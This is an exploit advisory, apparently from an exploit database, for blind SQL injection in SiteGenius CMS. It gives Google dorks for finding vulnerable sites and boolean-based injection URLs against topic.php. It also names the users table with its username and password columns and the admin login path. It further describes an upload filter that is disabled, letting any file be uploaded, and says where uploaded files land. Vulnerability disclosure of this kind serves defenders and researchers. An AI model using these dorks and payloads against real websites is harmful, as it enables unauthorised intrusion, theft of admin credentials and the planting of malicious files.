SiteGenius CMS Blind SQL Injection

`# Exploit Title: SiteGenius CMS Blind SQL Injection Vulnerabilities  
# Date (found): 7.2010  
# Author: MikiSoft (Email: [email protected])  
# CMS (Software) Site/Link: http://www.webtopsolutions.net, http://www.hostingcms.ch/home/index.php?p=143  
# CMS Info.: SiteGenius 2002 is framework for business excellence internet presence for small and medium enteprises. Although SiteGenius 2002 is content management tool, it has features for cataloguing products, services or any structurized resources, CRM intranet support, form wizard for simple creation of forms for interacting with visitors, and many more...  
# Versions (affected): All  
  
# Google dorks:  
inurl:"/sitegenius/topic.php?id=" ; inurl:"/sitegenius/article.php?id=" ; inurl:"/sitegenius/article.php?aid=" ; inurl:"/sitegenius/sitemap.php" ; inurl:"/sitegenius/index.php"  
  
## Blind SQLi Vulnerabilities:  
  
Affected files: topic.php & article.php.  
  
SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php  
  
Example (demonstration):  
http://sitename.domain/sitegenius/topic.php?id=1 and 1=1 '-> True  
http://sitename.domain/sitegenius/topic.php?id=1 and 1=2 '-> False  
etc./and so on...  
  
Btw. Here is location of uploaded images (you can upload any file in gallery, extension filter is disabled, but it writes that filter is enabled), ex. (if our uploaded filename is "file.ext", in gallery): http://sitename.domain/uploads/images/sitename_domain_file.ext  
  
###END###  
##P.S. If you have any questions, comments, or concerns, feel free to contact me.  
`